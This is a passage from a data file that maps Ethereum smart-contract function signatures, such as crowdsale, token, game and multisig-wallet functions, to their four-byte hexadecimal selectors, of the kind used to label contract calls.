"adjustPhaseBasedOnTime()": "0xaf93aebb", "setMaximumCoinsPerAddress(uint256)": "0xd1d675e4", "setMultisigMain(address)": "0xf9f286f9", "setMultisigPre(address)": "0x37e6e03b", "setTTCAddress(address)": "0xff0f2f71", "NemoXXToken()": "0xcdb75f2b", "sell_label(address,uint256)": "0x5cd689e6", "createSellENS(string,uint256)": "0xe07be247", "SellENS()": "0x50da9f6d", "transferOut(address)": "0x9894ba7c", "say(string)": "0xd5c61301", "AlphaChainConstructor()": "0x0b962e8f", "HVNToken()": "0x338dfafa", "massTransfer(address[],uint256[])": "0x02af2095", "VUToken()": "0x665ca475", "SaturnPresale(address,address,uint256,uint256,uint256)": "0x7e2bc821", "_emit(bytes,uint256,bytes32,bytes32,bytes32,bytes32)": "0x907dff97", "setUseDELEGATECALL(bool)": "0xbefff6af", "setMessageStatus(bool)": "0x5fc9d392", "deleteMessage(uint16)": "0x036ae645", "getColor(bytes1,bytes1,bytes1)": "0x0709544e", "getPixelNumber(bytes1,bytes1)": "0x6d63fa32", "setSaleState(uint16,bool)": "0xbc6633f7", "setPrice(uint16,uint256)": "0xbbc2986c", "setMessage(uint16,string)": "0x30fb6bfb", "setColor(uint16,uint24)": "0x8858adc6", "setOwner(uint16,address)": "0x95a70863", "buyPixel(address,uint16,uint24,string)": "0x5a052dff", "getColors()": "0x87c79d1d", "getPixel(uint16)": "0xefcf4f41", "Pixereum()": "0xb810b81c", "claimReveralTokens(address,uint256)": "0x197f8a82", "claimCoreTokens(address,uint256)": "0x34b88e04", "claimPaymentTokens(address,uint256)": "0x488bfa0b", "claimReservedTokens(address,uint256)": "0x8d30e65d", "NatCoinCrowdsale(uint256,uint256,uint256,address)": "0x7158e346", "getUsedReveralSupply()": "0xf03dc3d3", "finalize()": "0x4bb278f3", "clear()": "0x52efea6e", "add_monster(uint16,uint16,uint16)": "0x79216f5f", "recordCallback(address,uint256,bytes,bytes)": "0x37a6b9f8", "add_wall(uint16)": "0xe97b2190", "checkCallback(address,uint256,bytes,bytes)": "0x62c335c1", "add_staircase(uint16)": "0xf262de8c", "Verifier(address,uint256,uint8)": "0xf3c37bd5", "add_sword(uint16)": "0xcc2c5453", "add_shield(uint16)": "0xdd729530", "add_potion(uint16)": "0x7212b67e", "set_owner(address)": "0x7cb97b2b", "Level()": "0xf51cbc72", "checkEvent(address,bytes,bytes,uint256)": "0x5718b994", "get_all_accepted()": "0x6677febe", "get_all_best_offers()": "0x7140bdf3", "get_all_bet_values()": "0xd1a8d447", "get_all_players()": "0x407cfe5e", "get_all_num_levels()": "0x340f5e4e", "get_all_challenges()": "0xf249cf19", "getAccountBalance(bytes)": "0xc3d0a564", "num_challenges()": "0xdf3c8620", "accept(uint256)": "0x19b05f49", "registerAccountant(bytes,address)": "0x97d47a60", "new_offer(uint256,uint256)": "0xbfad16f4", "set_num_levels(uint256,uint256)": "0x46b5e202", "register(address,uint256)": "0x6d705ebb", "retrieveAccountBalance(bytes,bytes)": "0x6e8dad74", "bet_value()": "0x5b86914d", "getAccountBalance()": "0x6896fabf", "player()": "0x48db5f89", "make_offer()": "0x3ced842b", "num_levels()": "0x8365172c", "receiveInteger(bytes,uint256,uint16)": "0xe54d4051", "create_game()": "0x42909a9e", "transmitInteger(address,bytes,bytes,uint256,uint16)": "0x4c1b2446", "pay_royalty()": "0x21970c0c", "won()": "0x12c8052f", "over()": "0x7eaef50c", "checkBalance(address)": "0x5f515226", "logAnonymous(bytes,bytes,bytes,uint256)": "0xb29a0308", "logDoubleIndex(bytes,bytes,bytes,uint256)": "0xb409da05", "logSingleIndex(bytes,bytes,uint256)": "0xde5d953a", "clear_level()": "0x99753de7", "load_level(uint16)": "0xf504e0da", "level_up()": "0x2d8c1c35", "random_damage(uint256)": "0xecb98714", "move_monster(uint16,uint16)": "0xcec7260b", "move_monsters()": "0x6ed7c013", "return13()": "0x16216f39", "multiply7(int256)": "0xdcf537b1", "allow_move(uint16)": "0x37c390e3", "add(int256,int256)": "0xa5f3c23b", "move_to(uint16)": "0xf651bf44", "move(uint16)": "0xbe600276", "get_all_squares()": "0xe604cf9f", "Game()": "0xaef99eef", "f()": "0x26121ff0", "pay_royalties()": "0x75160a20", "monster_attack(uint256)": "0xa01bc729", "monster_hp(uint256)": "0xc368109c", "monsters(uint256)": "0xc0576b73", "object_types(uint256)": "0x1d5a9f3f", "object_locations(uint256)": "0xc13afa91", "num_monsters()": "0xc4bd8ebc", "num_objects()": "0x2030f721", "Kernal()": "0xc5ae6e0e", "registerLibrary(bytes,address)": "0x2635f4de", "getMinimumCallCost(uint256)": "0x6822abae", "getMinimumCallCost()": "0x75c589a0", "getDefaultFee()": "0x21bacf28", "getDefaultPayment()": "0x08f235ec", "FutureBlockCall(address,uint256,uint8,address,bytes,uint256,uint256,uint256)": "0x980e8c81", "beforeExecute(address)": "0xeec2b628", "suggestedGas()": "0x6560a307", "CallAborted(address,bytes)": "0x41868769", "CanaryTestnet()": "0xb5d3a379", "CanaryV6()": "0x5c634241", "Canary(address)": "0x84a7b223", "Other()": "0xdb4cacec", "setAccountBalance(address,uint256)": "0x46ddb7db", "setAccountBalance(uint256)": "0x08aba5aa", "deductFunds(address,uint256)": "0x8d72a473", "deductFunds(uint256)": "0xa1a66e56", "addFunds(address,uint256)": "0xbc4b3365", "addFunds(uint256)": "0xbe999705", "getAccountBalance(address)": "0x93423e9c", "Wallet(address)": "0x299e6b07", "token(uint256)": "0x044215c6", "Manager(address)": "0x4b0697e4", "DataSource()": "0xc0d2834b", "checkGoalReached()": "0x01cb3b20", "sendCoin(address,uint256)": "0x90b98a11", "token()": "0xfc0c546a", "SimpleStorage(uint256)": "0xf4b103d4", "execute(address)": "0x4b64e492", "TestWithConstructor(address,uint256[])": "0x29d017b5", "getValue()": "0x20965255", "setValue(uint256)": "0x55241077", "Example()": "0xb085b9a5", "test_someTest()": "0xf5804c35", "test_startBlock()": "0xd406e403", "add(bytes32,address)": "0x61641bdc", "partialRefund(uint256)": "0xd125a7e2", "updateKYClist(address[])": "0xda28c81a", "payTeam()": "0xac78dc16", "getBonus(uint256)": "0x4aa66b28", "refundPeriodStart()": "0x28c32be6", "refundPeriodOver()": "0xad3bf1f1", "checkRokBounty()": "0x2738154e", "checkRokTeam()": "0xc1a9953f", "checkRokSold()": "0x4a84fa81", "contribute(address)": "0x73e888fd", "Crowdsale(address,address)": "0xe0a09c1f", "clearAuthorization(address)": "0xa5925b5b", "cancelAuthorization(address,address)": "0x3482e0c9", "cancelAuthorizations(address,address[])": "0xba00ab60", "setAuthorization(address,address)": "0x0f5aa9f3", "setAuthorizations(address,address[])": "0x52c5b4cc", "deleteResources(address,address[],bytes4[])": "0x6446ebd8", "addResources(address,address[],bytes4[])": "0xf036ed56", "updatePermissionName(address,bytes32)": "0x537bf9a3", "deletePermission(address)": "0x98a05bb1", "newPermission(bytes32,address[],bytes4[])": "0xfc4a089c", "test_largeDeviationNotPermitted()": "0xc1f0dac1", "test_smallDeviationPermitted()": "0xe3bbab85", "underwrite(uint256,uint256[6],bytes)": "0xe49c9529", "decline(uint256,bytes32,bytes)": "0x5b21e539", "externalDecline(uint256,bytes32)": "0x0da76f1c", "FlightDelayUnderwrite(address)": "0xe3f037d8", "AgiCrowdsaleMock(address,address,uint256,uint256,uint256,uint256,uint256)": "0x350486da", "setBlockTimestamp(uint256)": "0xe0abdf66", "toggleKey(address,bool)": "0xdb078f08", "verified(uint256)": "0x1a9425c1", "wordCounter()": "0x4db8cbc9", "checkEtherBalance()": "0x16cba9d3", "checkBankBalance()": "0x6a4b3eca", "updateRate(uint256)": "0x69ea1771", "FlatPricingExt(uint256,bool)": "0xaaa99809", "destroyTokens(uint256,address,uint256,uint8[],bytes32[],bytes32[])": "0x3d432808", "issueTokens(uint256,address,uint256,uint8[],bytes32[],bytes32[])": "0x186c9b11", "deposit(address,address,uint256)": "0x8340f549", "deleteContract(uint256,address,uint8[],bytes32[],bytes32[])": "0x4182e5eb", "TokenAdminContract(address,address[],uint256,uint256)": "0xf6ceecc4", "tweakState()": "0xb84dda70", "Paused()": "0x9e87fac8", "getAddressBatchByUsername(bytes20[])": "0x1f2c6414", "getIndexBatchByUsername(bytes20[])": "0xf7daef72", "getUserByUsername(bytes20)": "0xa853d2cd", "RegReader(address)": "0xb7942d78", "unfreeze()": "0x6a28f000", "submit(bytes32[])": "0x7e8ff036", "addToResult(int256)": "0x3b4664f0", "MathPractice()": "0x8e13435b", "getStoreBalance()": "0xf05fae68", "getCart()": "0x21627dad", "getProduct(uint256)": "0xb9db15b4", "renameStoreTo(bytes32)": "0x91814577", "emptyCart()": "0xa0c8c156", "checkoutCart()": "0x713be000", "removeProductFromCart(uint256)": "0x6ebdac12", "insertProductIntoCart(uint256)": "0x7e6b867f", "deregisterCustomer(address,address)": "0x9ba73d43", "registerCustomer(address,address,bytes32,uint256)": "0x81c405c6", "deregisterProduct(uint256)": "0x12d72e99", "registerProduct(uint256,bytes32,bytes32,uint256,uint256)": "0x1bdbabdd", "Store()": "0x42e90c33", "getProof(string,string)": "0xbf0e9d61", "getAddr(string,string)": "0x34fb032e", "deleteIdentity(string,string)": "0x7bd1a731", "registerIdentity(string,string,string)": "0xbdc95b32", "getCreatedPayoutNumerators()": "0xe1db8e7e", "getCreatedPayoutDistributionHash()": "0x2854ba7d", "getDisputeCrowdsourcer()": "0xd397e9e4", "ANMInflationVesting()": "0xbdcfbc37", "setHoldPercentage(uint256)": "0xe26f21bf", "setEmissionLimit(uint256)": "0xde9daf91", "Auditor(address,address,address)": "0x18671d23", "NonEmissiveToken(address,string,uint8,string,string,uint256)": "0x2411e6a3", "forceNSFW(uint256,bool)": "0xacff2fce", "setAdOwner(uint256,address)": "0x759c7a58", "publish(uint256,string,string,string,bool)": "0x45ebc145", "buy(uint256,uint256,uint256,uint256)": "0x1281311d", "getAdsLength()": "0x7a6adab6", "KetherHomepage(address,address)": "0x330738a3", "getIudexScoreAll(address,address)": "0xf8247299", "getIudexScoreAll(address,bytes32)": "0xef7a5a2a", "getIudex(address)": "0x579db769", "getScore(uint256,bytes32)": "0xadb1f640", "addressToPersonId(address,address)": "0x8fb8f109", "multiline(uint256,uint256,uint256,bytes32)": "0xc5e4594f", "testExpiredBalance()": "0x941da7b8", "testUnexpiredBalance()": "0x1240de76", "getCreatedStatus(uint256)": "0x0307024f", "getExistsStatus(uint256)": "0x59b373f2", "getComponentId(uint256,uint256)": "0x823edd48", "getComponentCount(uint256)": "0xec56eb93", "handover(uint256,address)": "0x7706390b", "extract(uint256,uint256[])": "0x55a9794a", "removeComponent(uint256,uint256)": "0xa28d0185", "renewDec(uint256,uint256)": "0xe340d0d6", "withdraw_dao_fund(address,uint256)": "0xa24e20de", "withdraw_team_fund(address,uint256)": "0x8f46b586", "payCustom(address,uint256)": "0x06ec6272", "pay055loyal(address)": "0x1d2af28b", "pay055(address)": "0x8c90b2ea", "pay1(address)": "0x07ba217c", "winningProject()": "0x946bf4d7", "projectActive(uint256)": "0xcf504d48", "projectWeight(uint256)": "0xf37e741e", "swapProject(uint256)": "0xdfa0ca14", "addProject(uint256)": "0x57183698", "StartNewEpoch()": "0x6584ceb0", "Redenom()": "0x09ff4b75", "showAdmin()": "0x4f0e8656", "BosToken()": "0xd008d7a2", "BPTestCoin()": "0xfac08874", "submitQuery(uint256)": "0xf4d21515", "startTicker()": "0x233d264a", "setUpdatePeriod(uint256)": "0xe55fae77", "setBuildersAddress(address)": "0xc932ca62", "_sendPriceUpdate(address,uint256)": "0xd292e6cb", "setGas(uint256)": "0xdd51faa2", "CashToken()": "0x670396e7", "Sudosucks()": "0xeef44945", "cbrt(uint256)": "0xf42c56c2", "toPowerOfTwoThirds(uint256)": "0x965447d9", "toPowerOfThreeHalves(uint256)": "0xfdc89f73", "initialiseGlobals()": "0xcd306137", "assignICOState(address,uint256,uint256,uint8)": "0x2f6113dc", "injectEther()": "0x6a3a2119", "transferFromInternal(address,address,uint256,bytes)": "0x782da1ea", "getMyAverageDividendRate()": "0x7b89eef2", "getUserAverageDividendRate(address)": "0xf8ead7cf", "buyPrice(uint256)": "0xc4dbf622", "getDividendTokenBalanceOf(address)": "0x51392041", "getFrontEndTokenBalanceOf(address)": "0x4c146f38", "theDividendsOf(bool,address)": "0xb1f253f6", "myDividendTokens()": "0x6135e084", "myFrontEndTokens()": "0xbcaa218e", "getDividendTokenSupply()": "0xffcb1edb", "getFrontEndTokenSupply()": "0x96242f41", "getMyDividendRate()": "0xb607068c", "totalEthereumICOReceived()": "0x03d499ef", "changeBankroll(address)": "0xa78bcf6e", "startRegularPhase()": "0x27dffba6", "endICOPhase()": "0xa3a06c54", "startICOPhase()": "0xccb53365", "publicStartRegularPhase()": "0x3c7d6f30", "transferTo(address,address,uint256,bytes)": "0x19fb361f", "buyAndTransfer(address,address,bytes,uint8)": "0x627aa6d2", "buyAndTransfer(address,address,bytes)": "0xf2f8569f", "buyAndTransfer(address,address)": "0x269a7c3f", "createShop(address)": "0x513284c6", "isWallet(address)": "0xce5570ec", "createWallet()": "0x11ebbf24", "isBuyer(address,uint256)": "0x7eb14990", "canBuy(address,uint256)": "0x1346c20e", "update(uint256,uint256,uint256)": "0x6a054250", "resister(uint8,uint256,uint256)": "0x94ec3756", "getToken(string)": "0xc1733f68", "readMessage()": "0x031d5d01", "ControlContract(address)": "0x8cbeb340", "readData()": "0xbef55ef3", "wirteData(string)": "0xaa7b6c59", "DataContract()": "0x8e496832", "BitBallCoin()": "0xcf4cc8fb", "checkErrors()": "0x78eb890b", "exec(bytes)": "0x55f86501", "HolahopxToken()": "0xd71a0d7c", "Copeland()": "0xd538359e", "available_percentage()": "0xa93a77c1", "changeUserStatus(address,bool)": "0x36a1fb5f", "forwardTokens(address[])": "0x07144458", "_getRateIndex(uint256)": "0x1d54ab74", "_processFundsOverflow(address,uint256)": "0xcecd0ab5", "_processSalePurchase(address,uint256)": "0xc7506049", "_processPresalePurchase(address)": "0x0a7ead50", "initialize(uint256[],uint256[],uint256,address,uint256,address,address)": "0x1feb19d6", "DeshiCoin()": "0xaf49a228", "BadTronToken(address,address)": "0xc0c6a430", "refundToOwner(uint256,uint256)": "0x5ff456cb", "sellCMTAgainstEther(uint256)": "0xd24876b7", "buyCMTAgainstEther()": "0x7a1b63bc", "unhaltDirectTrade()": "0xea43b79f", "haltDirectTrade()": "0x89224227", "setGasReserve(uint256)": "0x0d5260e7", "setCMTForGas(uint256)": "0xfa113488", "setGasForCMT(uint256)": "0x1311b45e", "setEtherPrices(uint256,uint256)": "0x4b6a3334", "CryptoMountainsToken()": "0x6e77d4bb", "AggiungiNegoziante(address)": "0x780be5be", "BobMarleyCoin()": "0x9ca74595", "getReservedDestinationInfo(address,bytes32,address)": "0x95de00a2", "getReservedTokenDestinationList(address,bytes32)": "0xc4fa9c6b", "setWalletOwnerAddress(address,address)": "0x22b11169", "Restart(uint256)": "0x348e9779", "getTierWhitelist(address,bytes32,uint256)": "0x137b8721", "getWhitelistStatus(address,bytes32,uint256,address)": "0x15ddf344", "HTCCToken()": "0x274c343a", "isGlobalLock()": "0x7bc4be40", "AllLock()": "0x9bbc156b", "AllUnLock()": "0x42f5d95d", "unLock(address)": "0x76e6d2b4", "getEtherCoinPrice()": "0x30c47f77", "guessFlip()": "0x9ef46973", "FtechizTestToken()": "0x05bf3bf0", "EasyHashingCoin()": "0xf7f03516", "GetConfirmRound(address,uint8)": "0x29ec09cc", "SetConfirmRound(address,uint8,bool)": "0x096e47ca", "GetEvaluate(address,uint8)": "0x260b8f6e", "SetEvaluate(address,uint8,uint8)": "0xe4ef3eaa", "GetApplicantAddress()": "0xb7e6dfe3", "GetApplicant(address)": "0x29edfbb8", "SetApplicant(string,uint32,string,int256,string)": "0x298569f0", "transferInterviewer(address)": "0x999d46b9", "JournetToken()": "0x1541eb12", "auction(uint256)": "0x1200617f", "updateOrderNumber3(uint256)": "0x64ad6027", "updateOrderNumber(uint256)": "0xbb44e08d", "showCollectedFee()": "0xe1482188", "withdrawTokenRefund(uint256)": "0xe5b8d6e0", "secureTokenPay(uint256)": "0x8b11fb3e", "addOrder(uint256,uint256,address,address,uint256,address)": "0x931a5256", "MeepCoin()": "0x6afb92a1", "TEST1()": "0x9d038cd3", "isStormBirdContract()": "0x4f452b9a", "transferFrom(address,address,uint16[])": "0xa6fb475f", "transfer(address,uint16[])": "0xdb0ec968", "encodeMessage(uint256,uint256,uint16[])": "0xec58b996", "passTo(uint256,uint16[],uint8,bytes32,bytes32,address)": "0xedd5ede6", "loadNewTickets(bytes32[])": "0x2c8c28a7", "trade(uint256,uint16[],uint8,bytes32,bytes32)": "0x696ecc55", "GogaTokens()": "0xb6a4a0e9", "testLog()": "0x29372d21", "thorToken()": "0x18ff318d", "removeGameMachine(address)": "0x3016e108", "addGameMachine(address)": "0x50dc43a1", "loseWager(address,uint256,uint256,bool,uint256)": "0xf4838452", "sendRefund(uint256)": "0xdb681e9f", "payout(address,uint256,uint256,bool,uint256)": "0x0139caad", "withdrawBotFee(uint256)": "0xd3bced2c", "withdrawDevFee(address,uint256)": "0x89c5077f", "withdrawDonation(uint256)": "0x96afccb3", "wager(bool,uint256,uint256,uint8,bytes32,bytes32)": "0x0ecae7d3", "setBotAddress(address)": "0x2d4f40c6", "zeeshanabbc()": "0x4486598e", "incrementRead()": "0x8c924e9c", "incrementWrite()": "0x3edddc0a", "burnFrom(uint256,address)": "0x8a56f3ee", "getWhoPiad(address,address,address,address,address,address,address,uint256)": "0xaa04e566", "createTokenUri(uint256)": "0xc8234ac8", "create(address,address,address,address,address,address,address,uint256)": "0x006a6ef6", "Zylli()": "0x977564ed", "SayaToken(uint256)": "0x04e88f2d", "setApprovedAddress(address)": "0x9c5bbc89", "incCounter()": "0x22aacad5", "SPITEST()": "0x84df87c3", "rejectShipping(uint256,string)": "0xeaa59c74", "confirmShipping(uint256)": "0x32255d90", "shipToMe(string,uint256)": "0x1fbe480e", "priceWei()": "0xb7ec2086", "openShop()": "0xa6f5a22b", "newBeneficiary(address)": "0x507959e1", "ETH_EURCENT()": "0x093ae918", "createRandomNumber(string)": "0x45126711", "_generateRandomhashNumber(string)": "0xf45eb5b4", "_createNumber(string,uint256)": "0xe57b921d", "returnTokens3(address,uint256,uint256)": "0x0f76496a", "returnTokens2(address,uint256)": "0xb70d30bf", "returnToken(string,uint256)": "0x122d34d9", "getRestWhite(uint256,uint256)": "0xadbc9bed", "getTRed(uint256,uint256,uint256)": "0xa8bda3e9", "getARed(uint256,uint256)": "0xce9ae91c", "getTEth(uint256,uint256,uint256)": "0xa4e85358", "getAEth(uint256,uint256)": "0xdb8f0301", "getSysRestEth(uint256,uint256,uint256)": "0x0783d820", "getRatio(uint256,uint256,uint256)": "0x6e725302", "getAccountTotal(address)": "0x18237476", "getAccountRest(address)": "0x4c1f7635", "addWhite(uint256,uint256,uint256,bool)": "0xbb061fb5", "addStore(uint256,uint256)": "0x2d96a297", "addEth(uint256,uint256)": "0x7dfebff3", "updatePercentBase(uint256,uint256,uint256)": "0x6d2bf99c", "calcWhiteBase(uint256)": "0x6ff08dd6", "refundWhite(uint256,uint256,uint256,uint256)": "0x0098fe2b", "buyWhiteCore(uint256,uint256,uint256,uint256)": "0x8d91e803", "buyStoreCore(uint256,uint256,uint256)": "0x016d60b3", "distributeAll(uint256)": "0x94c176e4", "withdrawRed_(uint256,uint256)": "0x04157752", "addAff(uint256,bytes32)": "0xc3be8df3", "addVip(bytes32,string)": "0x046111e9", "reloadWhiteByName(uint256)": "0xe5af350e", "buyWhiteByName(bytes32)": "0x58931f7a", "sendStore(address,uint256)": "0xa5fc2994", "reloadStoreByName(uint256)": "0x35f0d665", "buyStoreByName(bytes32)": "0xa9b86924", "startActivated()": "0xfefc38fd", "SmartForestCoin()": "0xe863051c", "SearchTimeBlocknumber(string)": "0xbb64c79e", "totalEth_()": "0x15afa98e", "lastDonor()": "0x91b8a49a", "contributorsTotal()": "0x53e86a88", "zHQNumber()": "0xad0be174", "PRE_ICO_PRICE()": "0x1b3e100d", "referralSupply()": "0xd11ffc55", "RESERVES_SHARE()": "0x5bdb280f", "minimumContributionWeiByOneInvestor()": "0xd762755d", "startTimePresale()": "0xac066073", "activeValueBonus()": "0xf95bbc9c", "citadelAddress()": "0xd982a84e", "sumICOStage5()": "0xd92782ac", "token_price()": "0x7b4fd96e", "customers()": "0x06637876", "minerLockAddress()": "0xfba12c17", "secondCheckpointPrice()": "0xc9e3e66c", "getShareholderArray()": "0xe7ab4f1c", "SWAP_CAP()": "0xc4c39ba7", "dropAddress()": "0x65d1926d", "TOKEN_MULTIPLIER()": "0x2b093fe9", "pinnedCode()": "0x3bc7ebac", "p2_start()": "0x3bb28957", "liquidityPoolAllocation()": "0xe780377e", "bonusTokensPool()": "0x6047a00e", "escrowedTokens()": "0xd4def0ba", "difficultyScaleMultiplierLimit()": "0xa6ad57e6", "CWC_Address()": "0x44ff5a3e", "getPlayedGameJackpot()": "0xcf4e593a", "NeroSupply()": "0x4dfcf67a", "hashBetMax()": "0xbfba9029", "minBlockPurchase()": "0x7bce366f", "secondStageEnd()": "0x7d9d4bed", "applyRedenomination()": "0x48ff6525", "round2Bonus()": "0x510a3e2a", "transferManagerFactory()": "0x225da7e5", "attacker()": "0x48eb76ee", "getBurnPrice()": "0x2ae6218d", "refundOIDIndex_()": "0x65397d5e", "CMO_SHARE()": "0x241f675d", "vestedDate()": "0x69335938", "sumICOStage7()": "0x830245e3", "highTimeBonusValue()": "0x0c022933", "totalPreICOavailibleWithBonus()": "0x77cf0369", "TOKEN_ADDRESS()": "0x0bdf5300", "donatedAmount()": "0x5ab7f1a8", "FEATURE_TRANSFERS()": "0xc0d6568d", "totalFund()": "0x100aca47", "ethRelief()": "0x06ef856b", "pauseSwap()": "0xed6b5ad5", "stopInvest()": "0xf5238546", "abioSold()": "0x55f2de40", "oneMonth()": "0xc8b18b5b", "oraclizeGasExtraArtwork()": "0x19a5ce51", "future_round_percentage()": "0xc3e0ae67", "TokenCreationContract()": "0x242de145", "mineTotalBalance()": "0x156e9507", "TOKEN_SUPPLY_BOUNTY_LIMIT()": "0x4b1146ca", "minimunBTCToInvest()": "0xb107baa1", "hardCapInToken()": "0xa8132a46", "BONUS_TIER_5_LIMIT()": "0x10711911", "lastRefundedIndex()": "0x92a7843c", "MAX_NUM_PAYOUT_ATTEMPTS()": "0xc599d58f", "timeIncreasePerTx()": "0xe6c57a08", "Menu08()": "0xf20001b0", "etoken2()": "0x406838b3", "_currentOwner()": "0xfd42657a", "totalTokenRice()": "0x94495468", "secondRelease()": "0x695ec793", "deathData_v17()": "0xca24034b", "preSaleComplete()": "0x2fb27669", "MAX_NUMBER_OF_PREMIUM_SALES()": "0x8c02d13f", "lastRoundLengthUpdateStartBlock()": "0x668abff7", "minWeiToAccept()": "0xf8fc16ef", "TEAM_ACCOUNT()": "0x4b3ec03a", "finalizeLottery()": "0x456c2892", "dealToken()": "0x5280c3ee", "saleOpened()": "0x639a9a67", "feeRecipient()": "0x46904840", "ICO_Ended()": "0xdbd848e3", "thirdPriceTime()": "0xdc4b3115", "privateSold()": "0x154e45a4", "trent()": "0x9bd2af03", "softcapUSD()": "0x835ac5ce", "level_9_percent()": "0xac70e6c4", "whitelistMaxContribAmount()": "0xe8d83383", "accountPubPreSale()": "0xe61ab6c9", "tokensFor1EthP3()": "0xf0137edf", "crowdsaleWallet()": "0x56ff83c8", "PHN()": "0x20c58794", "minDonation()": "0x1c0e0225", "nextAmount()": "0x50f956db", "appreciationRate()": "0x8b31bd50", "displaymultisig()": "0xc7fb9aab", "ecoLock23()": "0x4a222b74", "promissoryUnits()": "0x5b54f077", "actionVotedRate()": "0x82b68f4f", "traded_token_seed_amount()": "0xab004a97", "terminationTime()": "0xce4254ce", "initial_supply()": "0x2405e3c6", "advisorsAddress()": "0x0dc10a60", "setEthartArtReward(uint256)": "0x79f00703", "setEthartRevenueReward(uint256)": "0x5939dd31", "setPatronReward(uint256)": "0x6f84eb6c", "setReferrerReward(uint256)": "0x83eca581", "setReferrer(address)": "0xa18a7bfc", "burnIndexedFrom(address,uint256)": "0x4746041f", "burnIndexed(uint256)": "0xe98cab50", "approveIndexed(address,uint256)": "0xd0a62566", "transferFromIndexed(address,address,uint256)": "0xaa23cb19", "transferIndexed(address,uint256)": "0x224bed07", "burnIndexedFromByAddress(address,address,uint256)": "0x55688000", "burnIndexedByAddress(address,uint256)": "0x840cfffd", "burnFromByAddress(address,uint256,address)": "0x23c1236a", "burnByAddress(address,uint256)": "0x60ad9d7b", "approveIndexedByAddress(address,address,uint256)": "0x887c4646", "approveByAddress(address,address,uint256)": "0xf17ba16b", "transferIndexedByAddress(address,uint256,address)": "0x14a3b19a", "transferByAddress(address,uint256,address)": "0x0ff244b2", "cancelIndexedSale()": "0x926a2456", "cancelIndexedSaleByAddress(address)": "0x5affcbb0", "fillIndexedBid(uint256)": "0xcac9ffbd", "fillIndexedBidByAddress(address,uint256)": "0x75456b49", "offerIndexedPieceForSale(uint256,uint256)": "0x177c75ae", "offerIndexedPieceForSaleByAddress(address,uint256,uint256)": "0x02581ab3", "cancelSaleByAddress(address)": "0x3d6e87c1", "fillBidByAddress(address)": "0x70767f6c", "offerPieceForSaleByAddress(address,uint256)": "0xf5fb17f2", "approveFactoryContract(address,bool)": "0xda6e11a5", "CreateIND(address,uint256)": "0x6593643c", "IndorseSaleContract()": "0x8effda0d", "BUXCOINMONEYCONTRACT()": "0xae08b8b3", "Kujira()": "0x5d80f643", "ETH420on420()": "0x7e69e0fc", "RRRToken()": "0xd6077912", "convertToMiniGGC(uint256)": "0x6fceaea2", "GoogleChainSale(address,uint256,uint256,uint256,uint256,uint256,uint256,address,address)": "0x07986518", "GoogleChainToken(address)": "0x90b25207", "ChangeTokenPrice(uint256)": "0x23a8792e", "PayToContract()": "0x75d60ba1", "PayNihilumToContract()": "0x4e7b1ce1", "claimNihilum()": "0x7d78b94d", "nihilumBalanceOf(address)": "0xe6d18a7a", "payNihilum()": "0xda8e2890", "Nihilum()": "0x49606d51", "PacersvsCavaliers420()": "0x5b5cf8cf", "nextKey(uint256)": "0x59f61c74", "hasNextKey(uint256)": "0x4dd83243", "hasKey(address)": "0xd36afad5", "tokenFreezing(address,bool)": "0xf0e61771", "userBanning(address)": "0x3d22d571", "getFirstAdmin()": "0x6eb5197d", "BitfuryToken()": "0x4d56a130", "Vulgus()": "0xfa49a13a", "BCOToken(address,string,string,uint256,uint256)": "0x07715fd4", "VestedMultisigWallet(address[],uint256,uint256)": "0xd7e3aab2", "SimpleTokenVesting(address,uint256)": "0x15312b50", "ownersConfirmedTransactions(address)": "0x18f2a0bb", "submitTokenTransaction(address,address,uint256)": "0xb4b14467", "removeOwnersConfirmations(address)": "0x0e2e4037", "SimpleMultisigWallet(address[],uint256)": "0x8cec9176", "FreezableToken()": "0xc1811783", "closeTokenSale(address)": "0xdbf5eb1c", "SkillChainPresale(uint256,uint256,uint256,address,uint256,address,address)": "0x3eae8ac8", "SkillChainToken()": "0xf6e87f81", "getContributorsLength()": "0x4ab6d337", "addBalance(address,address,uint256)": "0xd3bca884", "SkillChainContributions()": "0xbe7e2848", "CmctSale(address)": "0x26abc9ab", "bulkRelayCMCT(address[],uint256[],bytes32)": "0x37d004b3", "relayCMCT(address,uint256,bytes32)": "0xf17b6d9b", "withdrawEth(uint256,address,bytes32)": "0x1ab681e8", "disapproveUser(address,bytes32)": "0x306a2ea8", "approveUser(address,bytes32)": "0x0a95dbfa", "registerUser(address,bytes32)": "0xd7e0b6e3", "registerSelf(bytes32)": "0x85c3649f", "CMCT()": "0x0df4135a", "isCMCT()": "0xc46e614a", "SetFinalBlock(uint256)": "0x7641a8c6", "setRunSwitch(bool)": "0xfb283111", "getLastBlock()": "0x7f2c4ca8", "TimeLimitedStoppable()": "0x4ca63a84", "Moac()": "0xf685f9ad", "eggPrice()": "0x305e3552", "redeemEgg(address)": "0xe91bb26e", "purchaseEgg()": "0xbce2b9a3", "bulkPurchageEgg()": "0x57880042", "Aragon()": "0x655187b2", "transferGIM(address,address,uint256)": "0xaa994ab8", "setStreamerContract(address,uint256)": "0x5fd7793a", "Gimli()": "0xa595b655", "transferOtherERC20Token(address,uint256)": "0xbaaf2d4f", "releaseVesting(address)": "0xd486d129", "preAllocate(address,uint256,uint256)": "0xd033e6ee", "cancelCrowdsale()": "0xf7af21c9", "SETPointerToken()": "0x8339e153", "placeTokens(address,uint256)": "0x2d4364ae", "calculateRates()": "0xf7c0f4c6", "setNewRate(uint256)": "0x2d483bec", "calcDates(uint256,uint256)": "0xd3568560", "setDates(uint256,uint256)": "0xdedf141e", "getEcoSystemWallet()": "0x6b06afe7", "set(bytes12,address)": "0xbeb38b43", "getCurrentWallet()": "0x045f91ea", "startSale2Phase()": "0x6effe1c7", "startSale1Phase()": "0x9841a2d8", "startPreSalePhase()": "0x51e51b55", "startCloseSalePhase()": "0x06ee3b69", "getMinLimit()": "0xce50f926", "removeFromWhiteList(uint8,address)": "0xac7bb2b4", "addWhiteList(uint8,address,uint256)": "0x8a7e5144", "BOOYAHTEST()": "0xb9fb3ff8", "getPurchaseTimestamp(uint32)": "0x041d15c9", "setPurchaseTimestamp(uint32,uint64)": "0x2f520081", "sellMyBanana(uint256)": "0xa5a6d7b3", "getMyBananas()": "0x95ffff09", "buyBanana()": "0x02404fcb", "sellMyApple(uint256)": "0x0bd58493", "getMyApples()": "0x95ff3cc1", "buyApple()": "0x284131c7", "RisikoCoin()": "0xd5e83d9c", "DigiCash1()": "0xa058ce51", "mintIfNecessary(uint256)": "0xb3570116", "Ring()": "0x87b3be7d", "MyFreeCoin(uint256,string,uint8,string)": "0x3ef4691f", 